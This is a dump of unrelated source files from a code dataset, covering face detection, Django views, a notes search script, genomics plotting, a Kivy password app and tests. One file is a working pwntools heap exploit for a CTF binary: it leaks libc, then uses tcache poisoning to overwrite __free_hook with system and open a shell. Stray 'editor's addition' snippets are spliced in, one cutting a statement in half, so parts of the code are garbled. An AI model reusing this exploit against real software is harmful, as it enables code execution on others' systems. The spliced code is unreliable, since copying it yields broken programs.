to\")\n\t scaling_factor = max_height / float(height)\n\t if max_width/float(width) < scaling_factor:\n\t scaling_factor = max_width / float(width)\n\t # resize image\n\t cv2.resize(imagetoreduce, None, fx=scaling_factor, fy=scaling_factor, interpolation=cv2.INTER_AREA)\n\t return imagetoreduce\n\n\n\n# We point OpenCV's CascadeClassifier function to where our \n# classifier (XML file format) is stored\nface_classifier = cv2.CascadeClassifier('Haarcascades/haarcascade_frontalface_default.xml')\n\n# Load our image then convert it to grayscale\nimage = 
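# --- Hedged sketch (editor's addition): processCalcTable above picks row 9
# of each scraped <table> and reads fixed cell positions. The same
# row/cell walk on inline markup (the HTML is made up):
from bs4 import BeautifulSoup

html = '<table><tr><td>engine</td><td>1.5</td><td>0.3</td></tr></table>'
table = BeautifulSoup(html, 'html.parser').find('table')
cells = table.find_all('tr')[0].find_all('td')
total = float(cells[1].get_text().strip())
print(total)  # 1.5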
cv2.imread(sys.argv[1])\nimage2 = shrinkImage(image)\nprint (str(type(image)))\nprint (str(type(image2)))\n#image = shrinkImage(image)\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n# Our classifier returns the ROI of the detected face as a tuple\n# It stores the top left coordinate and the bottom right coordiantes\nfaces = face_classifier.detectMultiScale(gray, 1.3, 5)\n\n# When no faces detected, face_classifier returns and empty tuple\nif faces is ():\n print(\"No faces found\")\n\n# We iterate through our faces array and draw a rectangle\n# over each face in faces\nfor (x,y,w,h) in faces:\n cv2.rectangle(image, (x,y), (x+w,y+h), (127,0,255), 2)\n cv2.imshow('Face Detection', image)\n cv2.waitKey(0)\n\ncv2.destroyAllWindows()\n\n","sub_path":"face_deteaction_pass_img.py","file_name":"face_deteaction_pass_img.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"241846313","text":"class MyRange():\n \"\"\" Acts like `range` \"\"\"\n def __init__(self, start, stop, step = 1):\n self.myrng = range(start, stop, step)\n\n\ndef myrange(*args): # treats arguments as a tuple\n \"\"\" Acts like `range` \"\"\"\n n_arguments = len(args)\n if n_arguments not in [1,2,3]:\n raise TypeError(\"myrange only accepts 1 to 3 arguments\")\n if n_arguments == 1:\n return MyRange(0,args[0]).myrng\n if n_arguments == 2:\n return MyRange(args[0], args[1]).myrng\n if n_arguments == 3:\n return MyRange(args[0], args[1], args[2]).myrng\n\n\n\nimport unittest\n\nclass TestMyRangeClass(unittest.TestCase):\n def test_size(self):\n self.assertEqual(len([i for i in myrange(1,10,2)]), len([i for i in range(1,10,2)]))\n\n def test_wrong_number_of_args(self):\n with self.assertRaises(TypeError):\n myrange()\n myrange(1,2,3,4)\n \n def test_last_element(self):\n self.assertEqual(max([i for i in myrange(12)]),max([i for i in range(12)]))\n self.assertEqual(max([i for i in myrange(12,104,3)]),max([i for i in range(12,104,3)]))\n self.assertEqual(max([i for i in myrange(12,1,-1)]),max([i for i in range(12,1,-1)]))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"exercises/python/03_advanced/u_test.py","file_name":"u_test.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"186215746","text":"from django.shortcuts import render, get_object_or_404, get_list_or_404, redirect\nfrom django.urls import reverse\nfrom django.views.generic import TemplateView\nfrom django.http.response import HttpResponseRedirect\n\nfrom ..models import Farmer, Commune, Village, CallSession, Language\n\nfrom . 
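# --- Hedged sketch (editor's addition): note that cv2.resize returns a new
# array rather than resizing in place, so shrinkImage above hands back the
# original, unscaled image. A corrected version of the same logic:
import cv2

def shrink_image(img, max_height=800, max_width=800):
    height, width = img.shape[:2]
    if height <= max_height and width <= max_width:
        return img  # already small enough
    scale = min(max_height / float(height), max_width / float(width))
    return cv2.resize(img, None, fx=scale, fy=scale, interpolation=cv2.INTER_AREA)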
import base\n\n\nclass FarmerRegistration(TemplateView):\n\n def resolve_voice_labels(self, items, language):\n \"\"\"\n Returns a list of voice labels belonging to the provided list of choice_options.\n \"\"\"\n voice_labels = []\n for item in items:\n voice_labels.append(item.get_voice_fragment_url(language))\n return voice_labels\n\n def render_farmer_registration_form(self, request, session):\n # This is the redirect URL to POST the language selected\n redirect_url = reverse('service-development:farmer-registration', args=[session.id])\n\n if session.language is None:\n return base.redirect_add_get_parameters('service-development:language-selection', session.id,\n redirect_url=redirect_url)\n\n language = session.language\n communes = Commune.objects.all()\n villages = Village.objects.all()\n\n context = {\n \"redirect_url\": redirect_url,\n \"language\": language,\n 'communes': communes,\n 'villages': villages,\n 'commune_voice_labels':self.resolve_voice_labels(communes, language),\n 'village_voice_labels':self.resolve_voice_labels(villages, language),\n }\n\n return render(request, 'farmer_registration.xml', context, content_type='text/xml')\n\n def get(self, request, session_id):\n session = get_object_or_404(CallSession, pk=session_id)\n return self.render_farmer_registration_form(request, session)\n\n def post(self, request, session_id):\n \"\"\"\n After all required elements of the registration process\n have been filled, this function creates the farmer.\n After registration the farmer is redirected back to the start\n of the voice service.\n \"\"\"\n if 'commune_id' not in request.POST:\n raise ValueError('Incorrect request, commune not set')\n if 'village_id' not in request.POST:\n raise ValueError('Incorrect request, village not set')\n\n session = get_object_or_404(CallSession, pk=session_id)\n caller_id = session.caller_id\n commune = request.POST[\"commune_id\"]\n village = request.POST[\"village_id\"]\n\n farmer = Farmer(caller_id=caller_id, commune=commune, village=village, service=session.service)\n\n if session.service.registration_language:\n farmer.language = session.language\n\n farmer.save()\n\n session.link_to_farmer(farmer)\n\n session.record_step(None, \"Registered as farmer: %s\" %str(farmer))\n\n # Return to start of voice service\n return redirect('service-development:voice-service', voice_service_id = session.service.id, session_id = session.id)\n","sub_path":"vsdk/service_development/views/farmer.py","file_name":"farmer.py","file_ext":"py","file_size_in_byte":3024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"448705984","text":"# notes_4.py 26-Jul-2018\r\n\"\"\"\r\nSupport multiple patterns:\r\n pat1 [& pat2 [& pat3 ...]] - must contain pat1 AND pat2 AND pat3 ...\r\n pat1 [| pat2 [| pate ...]] - must contain pat1 OR pat2 OR pat3 ...\r\n\r\n Interpretation:\r\n & pat_N ==> If pat_N is not in line => Don't print line\r\n | pat_N ==> If pat_N is present and no \"& pat\" are missing print line\r\n\r\n patterns have no embeded white space\r\n \r\n\r\nWrite a \"Notes\" program. The program will display lines\r\nfrom a text file, containing a given text string.\r\nTest:\r\nfile name = \"people.notes\"\r\ntext = \"Watertown\"\r\n Implementation Iterations:\r\nSetup test file(s): \"test.notes\", \"people.notes\"\r\n 1.\tRead specific file e.g. \"test.notes\", printing out all lines\r\n 2.\tPrint only lines containing \"student\"\r\n How to match lines ? 
Google \"python search for substring\" ?\r\n Support case insensitive match (Student, STUDENT)\r\n 3.\tPrompt for, then accept file name, pattern\r\n 4.\t[Extra Credit] Support multiple text patterns\r\n\r\n\"\"\"\r\nimport re\r\n\r\n# Default values\r\ndef_file_name = \"test.notes\"\r\ndef_pattern = \"student\"\r\n\r\n# Set to default values\r\npattern = def_pattern\r\n\r\nwhile True:\r\n file_name = def_file_name\r\n inp = input(\"Enter file name[\" + file_name + \"] \")\r\n inp = inp.rstrip()\r\n if inp == \"\":\r\n inp = file_name\r\n file_name = inp\r\n try:\r\n finp = open(file_name)\r\n break # Got opened file\r\n \r\n except IOError :\r\n print(\"Can't open file \", file_name)\r\n \r\n\r\n\r\n\r\ninp = input(\"Enter pattern[\" + pattern + \"] \")\r\ninp = inp.rstrip()\r\nif inp == \"\":\r\n inp = pattern\r\npattern = inp\r\n\"\"\"\r\nlooking for\r\n begining of string\r\n or white space\r\n or &\r\n or |\r\n followed by group of non-(&|) characters\r\n We accept zero or more whitespace characters to preceed and\r\n follow the beginning character\r\n\"\"\"\r\nif pattern.find('&') < 0 and pattern.find('|') < 0:\r\n pats = []\r\n pat_list = pattern.split() # all space separated\r\n for pat in pat_list:\r\n pats.append(('&', pat))\r\nelse:\r\n pats = re.findall(r'\\s*(^|[\\s&|])\\s*([^&|]+)', pattern)\r\n \r\nor_pats = [] # | pat - accept if no and pat missing \r\nand_pats = [] # & pat - accept only if present\r\n\r\ndef_pat_type = '&' # Default type\r\nif pattern.find('|') >= 0:\r\n def_pat_type = '|' # If we find | we make the default\r\n \r\nfor ind, pat in pats:\r\n if ind == '|':\r\n def_pat_type = ind\r\n or_pats.append(pat)\r\n elif ind == '&':\r\n and_pats.append(pat)\r\n def_pat_type = ind\r\n else:\r\n if def_pat_type == '|': # treat as default type\r\n or_pats.append(pat)\r\n else:\r\n and_pats.append(pat)\r\n\r\npattern_lc = pattern.lower() # Force pattern to lower case\r\nfor line in finp:\r\n line = line.rstrip() # All trailing white space\r\n line_lc = line.lower()\r\n and_found = 0\r\n or_found = 0\r\n for and_pat in and_pats:\r\n if line_lc.find(and_pat) >= 0:\r\n and_found += 1\r\n for or_pat in or_pats:\r\n if line_lc.find(or_pat) >= 0:\r\n or_found += 1\r\n if len(and_pats) > 0:\r\n if and_found == len(and_pats):\r\n if len(or_pats) > 0:\r\n if or_found > 0:\r\n print(line) # At least one of the ors\r\n else:\r\n print(line) # No ors to check\r\n elif or_found > 0:\r\n print(line)\r\n","sub_path":"exercises/notes_4_x.py","file_name":"notes_4_x.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"318048661","text":"#!/usr/bin/env python\n\n\"\"\"\n:Author: Sebastian Röner\n:Contact: sebastian.roener@charite.de\n:Date: 08.09.2020\n\"\"\"\n\nimport matplotlib\nimport pandas as pd\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom scipy import stats\n\nmatplotlib.use(\"pdf\")\n\n\n# get variables from snakefile\n\nWPS = snakemake.input[\"WPS\"]\nWPS_refs = snakemake.input[\"WPS_ref\"]\nCOV = snakemake.input[\"COV\"]\nCOV_refs = snakemake.input[\"COV_ref\"]\nsample_ID = snakemake.params[\"sample\"]\nref_IDs = snakemake.params[\"ref_IDs\"]\ntarget = snakemake.params[\"target\"]\noutfile = snakemake.output[0]\n\n# def functions\n\n\ndef calculate_flanking_regions(val: int):\n \"\"\"Calculates flanking regions for point of interest.\n\n Args:\n val (int): should be length of value vector\n\n Raises:\n TypeError: Only integers are allowed\n\n Returns:\n [iterator]: range 
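# --- Hedged sketch (editor's addition): the matching loop above counts how
# many '&' and '|' patterns hit each line; all()/any() state the same rule
# ("every & pattern present, and at least one | pattern if any were given")
# more directly:
def line_matches(line, and_pats, or_pats):
    line = line.lower()
    if not all(p in line for p in and_pats):
        return False
    return any(p in line for p in or_pats) if or_pats else True

assert line_matches('Jane, student, Watertown', ['student'], [])
assert not line_matches('Jane, teacher', ['student'], ['watertown'])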
of values around center point (e.g. range(-1000,1000))\n \"\"\"\n\n if not isinstance(val, int):\n raise TypeError(\"Only integers are allowed\")\n\n if val % 2 == 0:\n flank = int(val / 2)\n region = range(-flank, flank)\n elif val % 2 == 1:\n flank_l = int(val / 2 - 0.5)\n flank_r = int(val / 2 + 0.5)\n region = range(-flank_l, flank_r)\n return region\n\n\ndef add_sample(path: str):\n \"\"\"Reads .csv file, calculates mean over all rows and divides by trimmed mean.\n\n Args:\n path (str): Path to a .csv file\n\n Returns:\n [type]: [description]\n \"\"\"\n sample = pd.read_csv(path, header=None).mean()\n sample = sample / stats.trim_mean(sample, 0.25)\n return sample\n\n\n# load tables containing position specific scores for all defined target regions\n# average over all regions per sample and substract the trimmed mean to normalise\n\n\nav_WPS = pd.DataFrame()\nav_WPS[sample_ID] = add_sample(WPS)\nfor (ref_ID, WPS_ref) in zip(ref_IDs, WPS_refs):\n av_WPS[ref_ID] = add_sample(WPS_ref)\n\nav_WPS[\"position\"] = calculate_flanking_regions(len(av_WPS))\nav_WPS = av_WPS.set_index(\"position\")\n\nav_COV = pd.DataFrame()\nav_COV[sample_ID] = add_sample(COV)\nfor (ref_ID, COV_ref) in zip(ref_IDs, COV_refs):\n av_COV[ref_ID] = add_sample(COV_ref)\n\nav_COV[\"position\"] = calculate_flanking_regions(len(av_WPS))\nav_COV = av_COV.set_index(\"position\")\n\n# create line plots and save to a single pdf\n\nwith PdfPages(outfile) as pdf:\n Fig_WPS = av_WPS.plot(\n title=f\"adjusted WPS: {target} target regions\",\n xlabel=\"Position relative to target site\",\n ylabel=\"normalized WPS\",\n )\n Fig_Cov = av_COV.plot(\n title=f\"adjusted read coverage: {target} target regions\",\n xlabel=\"Position relative to target site\",\n ylabel=\"normalized read coverage\",\n )\n pdf.savefig(Fig_WPS.get_figure())\n pdf.savefig(Fig_Cov.get_figure())\n","sub_path":"workflow/scripts/WPS/overlays.py","file_name":"overlays.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"432361080","text":"#!/usr/bin/env python\n\nfrom pwn import *\ncontext.log_level = 'DEBUG'\n\n\ndebug=True\np = process('./Protobs')\n#libc = ELF('./libc.so.6')\nlibc = ELF('./libc.so.6')\n#gdb.attach(p,'heap-analysis')\n\n\ndef create_without_desc(game,contrast,gamma,x_axis,y_axis,controller,size_description):\n p.sendlineafter('~$ ', str(2))\n p.sendlineafter(' [ Game ]: ',str(game))\n p.sendlineafter('[ Contrast ]: ', str(contrast))\n p.sendlineafter('[ Gamma ]: ', str(gamma))\n p.sendlineafter('[ Resolution X-Axis ]: ', str(x_axis))\n p.sendlineafter('[ Resolution Y-Axis ]: ', str(y_axis))\n p.sendlineafter('[ Controller ]: ', str(controller))\n p.sendlineafter('[ Size of Description ]: ', str(size_description))\n\ndef create_desc(game,contrast,gamma,x_axis,y_axis,controller,size_description,description):\n p.sendlineafter('~$ ', str(2))\n p.sendlineafter(' [ Game ]: ',str(game))\n p.sendlineafter('[ Contrast ]: ', str(contrast))\n p.sendlineafter('[ Gamma ]: ', str(gamma))\n p.sendlineafter('[ Resolution X-Axis ]: ', str(x_axis))\n p.sendlineafter('[ Resolution Y-Axis ]: ', str(y_axis))\n p.sendlineafter('[ Controller ]: ', str(controller))\n p.sendlineafter('[ Size of Description ]: ', str(size_description))\n p.sendlineafter('[ Description ]: ',str(description))\n\n\ndef list_():\n p.sendlineafter('protobs@player2:~$ ', str(1))\n ret = p.recvuntil('protobs')\n log.info(\"list of configuration : \" + ret)\n\ndef read(idx,description):\n 
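# --- Hedged sketch (editor's addition): add_sample above normalises each
# averaged profile by its 25%-trimmed mean so samples stay comparable.
# The core of that step on toy numbers:
import numpy as np
from scipy import stats

profile = np.array([1.0, 1.1, 0.9, 5.0, 1.0])  # one outlier
normalised = profile / stats.trim_mean(profile, 0.25)
print(normalised.round(2))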
p.sendlineafter('protobs@player2:~$ ', str(3))\n p.sendlineafter('[ Config Index ]: ',str(idx))\n ret = p.recvuntil('protobs')\n return ret[:-1]\n\n\ndef delete(idx):\n p.sendlineafter('~$ ', str(4))\n p.sendlineafter('[ Config Index ]: ', str(idx))\n\n\n\n\ndescription= \"A\" * 0x60\nsize=0x450\ncreate_desc(\"hello\",0,0,0,0,0,size,description) ### 0x700 to not be in tcache range\ndescription= \"B\" * 511\ncreate_desc(\"hello\",0,0,0,0,0,size,description) ### 0x700 to not be in tcache range\ndescription= \"C\" * 511\ncreate_desc(\"hello\",0,0,0,0,0,size,description) ### 0x700 to not be in tcache range\n\ndelete(1) ## To Not free the head or tail of the heap but the MIDDLE\n\ncreate_without_desc(\"hello\",0,0,0,0,0,0)\nlist_()\np.sendlineafter('@player2:~$ ', str(3))\np.sendlineafter('[ Config Index ]: ',str(1))\np.recvuntil('[ Description ]: ')\n\n\n\n\n\n\n#gef p system\n#Cannot access memory at address 0x7fb53ec9ffd0\n#gef print __libc_start_main\n#Cannot access memory at address 0x7fb53ec73a80\n#gef p 0x7fb53ec9ffd0 - 0x7fb53ec73a80\nlibc_offset=0x001e4ca0\nsystem_offset=0x0052fd0\n\nfree_hook = libc.symbols['__free_hook']\n\n\nlibc_leak = u64(p.recv(6).ljust(8, '\\x00'))\nlibc_base = libc_leak - libc_offset\nsystem=libc_base + system_offset\n\n\nlog.info(\"Leak: 0x{:x}\".format(libc_leak))\nlog.info(\"Libc: 0x{:x}\".format(libc_base))\nlog.info(\"system: 0x{:x}\".format(system))\nlog.info('__free_hook: ' + hex(free_hook))\n\n### SECOND PART\ndescription = \"0xdeadbeef\"\nsize = 0x180\ncreate_desc(\"hello\",0,0,0,0,0,size,description)\ndescription = \"0xdeadbeef\"\nsize = 0x180\ncreate_desc(\"hello\",0,0,0,0,0,size,description)\n\n\ndelete(3)\n\ndescription = \"0xdeadbeef\"\nsize = 0x100\ncreate_desc(\"hello\",0,0,0,0,0,size,description)\n\ndelete(3) # delete config\n\n\n\n\n#### EXPLOIT ON https://syedfarazabrar.com/2019-10-12-picoctf-2019-heap-challs/#zero_to_hero\n# Add a 0x50 and 0x180 chunk\ndescription = \"A\" * 0x58\nsize = 0x58\ncreate_desc(\"hello\",0,0,0,0,0,size,description)\ndescription = \"B\"*0x180\nsize = 0x180\ncreate_desc(\"hello\",0,0,0,0,0,size,description)\n\n\n\n\n# Free them both\ndelete(3) #0 # Goes into 0x50 tcache bin\ndelete(4) #1 # Goes into 0x180 tcache bin\n\n# Get back the 0x50 chunk, but also null byte overflow into the 0x180 chunk\n# Also put in /bin/sh\\x00 into it for later use\nsize=0x58\ndescription='/bin/sh\\x00' + 'A'*0x50\ncreate_desc(\"hello\",0,0,0,0,0,size,description) # chunk A\n\n# The 0x180 chunk's size is now actually 0x100 (due to null byte overflow)\n# This means we can free it again immediately\ndelete(5) #1 # Goes into 0xf0 tcache bin\n\n\n# Get back the 0x100 chunk out of the 0x180 tcache bin\nsize=0x180\ndescription='C'*0x180\ncreate_desc(\"hello\",0,0,0,0,0,size,description) # chunk B\n\n\n# Since tcache_get will null out the key, we can free it immediately\ndelete(7) #3 # Goes into 0xf0 tcache bin\n\n# Now: tcache[0x100] -> Chunk B <- Chunk B\n\n\n# We do the usual tcache poisoning attack\n\n# Get Chunk B from 0xf0 tcache bin and change it's FD to __free_hook\nsize=0xf0\ndescription=p64(free_hook) + 'D'*0xe8\ncreate_desc(\"hello\",0,0,0,0,0,size,description)\n\nsize=0xf0\ndescription='E'*0xf0\n# Allocates chunk B again\ncreate_desc(\"hello\",0,0,0,0,0,size,description)\n\nsize=0xf0\ndescription=p64(system) + 'F'*0xe8\n# Allocates chunk on __free_hook, change it to system\ncreate_desc(\"hello\",0,0,0,0,0,size,description)\n\n# Call free on the chunk with /bin/sh\\x00 in it\n# This will then call free('/bin/sh\\x00') which calls 
system('/bin/sh\\x00')\ndelete(4) #0\n\np.interactive()\n","sub_path":"protobs_exploit.py","file_name":"protobs_exploit.py","file_ext":"py","file_size_in_byte":5034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"151678625","text":"################################################## pw-gen-alg.py\n# Creation Date:\t21/12/2016\n# Current Version:\t0.1\n# Author:\t\tmostly\n\n#################### LIBRARIES\nimport kivy\nkivy.require('1.1.3')\nfrom kivy.app import App # GUI\n#from kivy.uix.gridlayout import GridLayout\n#from kivy.uix.anchorlayout import AnchorLayout\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.label import Label\nfrom kivy.uix.textinput import TextInput\nfrom kivy.uix.button import Button\nfrom kivy.uix.dropdown import DropDown\nimport hashlib # Hasing used by various algorithms\nimport pickle # I/O for character tables\nimport random # Creating character tables\nimport time # Filenames and seeding\nimport os # Finding character tables\nimport os.path \n\n#################### DEFINITIONS\nDEFAULT_CHARACTER_SET = [\n ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'],\n ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'], \n ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0'], \n ['!', '@', '#', '$', '%', '^', '&', '*', '(', ')', '-', '_', '+', '=']\n ]\nENCRYPTION_METHODS = ('JoadCrypt-SHA256', 'JoadCrypt-MD5')\nHASHING_METHODS = ('SHA1', 'SHA256', 'MD5')\n\n\n#################### FUNCTIONS\n#------------------- Generate_Default_Character_Table\n# Creates a new character tables\n# Inputs : None\n# Outputs : None\n#\ndef Generate_Default_Character_Table(tableTitle):\n characterTable = {}\n\n characterTable['Title'] = tableTitle\n\n # Current time\n currentTime = time.localtime()\n characterTable['Date'] = str(currentTime.tm_year) + '-' + str(currentTime.tm_mon) + '-' + str(currentTime.tm_mday) + ' ' + str(currentTime.tm_hour) + ':' + str(currentTime.tm_min) + ':' + str(currentTime.tm_sec)\n\n characterTable['Exclusion-String'] = ',./<>?;\":[]{}`~' + \"'\" + \"\\\\\"\n\n\n # Set length\n characterTable['Set-Length'] = 50\n\n # Set up character subsets\n wBuffer = list(DEFAULT_CHARACTER_SET[0])\n xBuffer = list(DEFAULT_CHARACTER_SET[1])\n yBuffer = list(DEFAULT_CHARACTER_SET[2])\n zBuffer = list(DEFAULT_CHARACTER_SET[3])\n\n # Randomize the subsets to produce the data sets\n random.seed()\n for dataSetNumber in range(characterTable['Set-Length']):\n dataSetIndex = 'Data-' + str(dataSetNumber)\n random.shuffle(wBuffer)\n random.shuffle(xBuffer)\n random.shuffle(yBuffer)\n random.shuffle(zBuffer)\n characterTable[dataSetIndex] = [wBuffer, xBuffer, yBuffer, zBuffer]\n \n outputFileName = characterTable['Title']\n pickle.dump(characterTable, open(outputFileName, 'wb'))\n\n#################### WIDGETS\n#------------------- Main_Screen\nclass Main_Screen(FloatLayout):\n def __init__(self, **kwargs):\n super(Main_Screen, self).__init__(**kwargs)\n self.size = (350, 350)\n \n # Character Table Encryption label\n self.add_widget(Label(text='Character Table Encryption', size_hint=(0.8,0.05) , pos_hint={'center_x':0.5, 'y':0.95}))\n # Character Table Selector\n self.add_widget(Label(text='Character Table', size_hint=(0.3,0.05), pos_hint={'x':0, 'y':0.90}))\n # Check for character tables\n characterTablesPresent = []\n for entry in os.listdir('.'):\n if 
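# --- Hedged sketch (editor's addition): u64(p.recv(6).ljust(8, '\x00')) in
# the exploit above widens a 6-byte little-endian pointer leak to 8 bytes.
# Without pwntools, struct does the same:
import struct

leak = b'\xa0\xca\x1e\x00\xb5\x7f'  # example 6-byte leak
value = struct.unpack('<Q', leak.ljust(8, b'\x00'))[0]
print(hex(value))  # 0x7fb5001ecaa0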
os.path.splitext(os.path.basename(entry))[1] == '.ct':\n characterTablesPresent.append(entry)\n # If no character tables present create one\n if len(characterTablesPresent) == 0:\n currentTime = time.localtime()\n # Table name = default.ct\n tableTitle = 'default.ct'\n Generate_Default_Character_Table(tableTitle)\n characterTablesPresent.append(tableTitle)\n # Character table dropdown selector\n self.dropdownct = DropDown()\n for characterTable in characterTablesPresent:\n btn = Button(text='%r' % characterTable, size_hint_y = None, height = 35)\n btn.bind(on_release=lambda btn: self.dropdownct.select(btn.text))\n self.dropdownct.add_widget(btn)\n self.selectorButtonCt = Button(text='Select character table', size_hint=(0.6, 0.05), pos_hint={'x':0.35, 'y':0.90})\n self.selectorButtonCt.bind(on_release=self.dropdownct.open)\n self.dropdownct.bind(on_select=lambda instance, x: setattr(self.selectorButtonCt, 'text', x))\n self.add_widget(self.selectorButtonCt)\n # Encryption Selector\n self.add_widget(Label(text='Encryption Type', size_hint=(0.3,0.05), pos_hint={'x':0, 'y':0.85}))\n # Encryption dropdown selector\n self.dropdownenc = DropDown()\n for encryptionMethod in ENCRYPTION_METHODS:\n btn = Button(text='%r' % encryptionMethod, size_hint_y = None, height = 35)\n btn.bind(on_release=lambda btn: self.dropdownenc.select(btn.text))\n self.dropdownenc.add_widget(btn)\n self.selectorButtonEnc = Button(text='Select encryption method', size_hint=(0.6, 0.05), pos_hint={'x':0.35, 'y':0.85})\n self.selectorButtonEnc.bind(on_release=self.dropdownenc.open)\n self.dropdownenc.bind(on_select=lambda instance, x: setattr(self.selectorButtonEnc, 'text', x))\n self.add_widget(self.selectorButtonEnc)\n\n # Hashing Encryption label\n self.add_widget(Label(text='Hashing Encryption', size_hint=(0.8,0.05) , pos_hint={'center_x':0.5, 'y':0.75}))\n # Hashing Method Selector\n self.add_widget(Label(text='Hashing Method', size_hint=(0.3,0.05), pos_hint={'x':0, 'y':0.70}))\n # Hashing method dropdown selector\n self.dropdownhash = DropDown()\n for hashingMethod in HASHING_METHODS:\n btn = Button(text='%r' % hashingMethod, size_hint_y = None, height = 35)\n btn.bind(on_release=lambda btn: self.dropdownhash.select(btn.text))\n self.dropdownhash.add_widget(btn)\n self.selectorButtonHash = Button(text='Select hashing method', size_hint=(0.6,0.05), pos_hint={'x':0.35,'y':0.70})\n self.selectorButtonHash.bind(on_release=self.dropdownhash.open)\n self.dropdownhash.bind(on_select=lambda instance, x: setattr(self.selectorButtonHash, 'text', x))\n self.add_widget(self.selectorButtonHash)\n\n # Input strings labels\n self.add_widget(Label(text='Input Strings', size_hint=(0.8,0.05) , pos_hint={'center_x':0.5, 'y':0.60}))\n # Input strings text input\n self.add_widget(Label(text='Environment', size_hint=(0.3,0.05), pos_hint={'x':0, 'y':0.55}))\n self.environment = TextInput(multiline=False, size_hint=(0.7,0.05), pos_hint={'x':0.3,'y':0.55})\n self.add_widget(self.environment)\n self.add_widget(Label(text='Username', size_hint=(0.3,0.05), pos_hint={'x':0, 'y':0.5}))\n self.username = TextInput(multiline=False, size_hint=(0.7,0.05), pos_hint={'x':0.3,'y':0.5})\n self.add_widget(self.username)\n self.add_widget(Label(text='Timestring', size_hint=(0.3,0.05), pos_hint={'x':0, 'y':0.45}))\n self.timestring = TextInput(multiline=False, size_hint=(0.7,0.05), pos_hint={'x':0.3,'y':0.45})\n self.add_widget(self.timestring)\n\n #self.add_widget(Label(text='Status:', size_hint_x=None, width=130))\n #self.status = Label(text='Waiting for 
input', size_hint_x=None, width=300)\n #self.add_widget(self.status)\n #self.generate = Button(text='Generate', size_hint_x=None, width=130)\n #self.add_widget(self.generate)\n #self.generate.bind(on_press=self.Generate_Pressed)\n #self.output = TextInput(multiline=False, size_hint_x=None, width=300)\n #self.add_widget(self.output)\n\n#################### APPLICATION CLASS\nclass PwGenAlg(App):\n def build(self):\n return Main_Screen()\n\nif __name__ == '__main__':\n PwGenAlg().run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"81832252","text":"from __future__ import division\n\nimport random\nfrom copy import copy\nfrom operator import attrgetter\nfrom unittest import TestCase, skip, SkipTest\n\nfrom parameterized import parameterized\nimport numpy as np\nfrom numpy.testing import assert_almost_equal, assert_allclose\nimport pandas as pd\nfrom pandas.core.generic import NDFrame\nfrom scipy import stats\nfrom six import iteritems, wraps\nimport quantbear\n\nDECIMAL_PLACES = 8\n\nclass TestStats(TestCase):\n\n @parameterized.expand([\n (100, 100, 1, 0.2, 0, True, 7.9655674554058038),\n (100, 100, 1, 0.2, 0, False, 7.9655674554058038),\n (100, 125, 1, 0.2, 0, True, 1.4824118915130242),\n (100, 125, 1, 0.2, 0, False, 26.482411891513024),\n (100, 75, 1, 0.2, 0, True, 25.581185846275545),\n (100, 75, 1, 0.2, 0, False, 0.58118584627555148),\n (100, 100, 0.75, 0.2, 0, True, 6.9012553440432924),\n (100, 100, 1.75, 0.2, 0, True, 10.524315781125253),\n (100, 100, 1, 0.5, 0, True, 19.741265136584744),\n (100, 100, 1, 0, 0, True, np.nan),\n (100, 100, 1, 0.2, 0.05, True, 10.450583572185572),\n (0.00000001, 100, 1, 0.2, 0.00, True, 0.0)\n ])\n def test_black_scholes(self, s, k, t, v, rf, call, expected):\n black_scholes = self.quantbear.black_scholes(\n s,\n k,\n t,\n v,\n rf,\n call=call\n )\n assert_almost_equal(\n black_scholes,\n expected,\n 4)\n\n @property\n def quantbear(self):\n \"\"\"\n Returns a wrapper around the quantbear module, so tests can\n perform input conversions or return type checks on each call to an\n quantbear function.\n Each test case subclass can override this property, so that all the\n same tests are run, but with different function inputs or type checks.\n This was done as part of enabling quantbear functions to work with\n inputs of either pd.Series or np.ndarray, with the expectation that\n they will return the same type as their input.\n Returns\n -------\n quantbear\n Notes\n -----\n Since some parameterized test parameters refer to attributes on the\n real quantbear module at class body scope, this property must be\n defined later in the body than those references. 
That way, the\n attributes are looked up on the quantbear module, not this property.\n \"\"\"\n return ReturnTypequantbearProxy(self, (pd.Series, float))\n\n\nclass ReturnTypequantbearProxy(object):\n \"\"\"\n A wrapper around the quantbear module which, on each function call, asserts\n that the type of the return value is in a given set.\n Also asserts that inputs were not modified by the quantbear function call.\n Calling an instance with kwargs will return a new copy with those\n attributes overridden.\n \"\"\"\n def __init__(self, test_case, return_types):\n self._test_case = test_case\n self._return_types = return_types\n\n def __call__(self, **kwargs):\n dupe = copy(self)\n\n for k, v in iteritems(kwargs):\n attr = '_' + k\n if hasattr(dupe, attr):\n setattr(dupe, attr, v)\n\n return dupe\n\n def __copy__(self):\n newone = type(self).__new__(type(self))\n newone.__dict__.update(self.__dict__)\n return newone\n\n def __getattr__(self, item):\n return self._check_input_not_mutated(\n self._check_return_type(\n getattr(quantbear, item)\n )\n )\n\n def _check_return_type(self, func):\n @wraps(func)\n def check_return_type(*args, **kwargs):\n result = func(*args, **kwargs)\n self._test_case.assertIsInstance(result, self._return_types)\n return result\n\n return check_return_type\n\n def 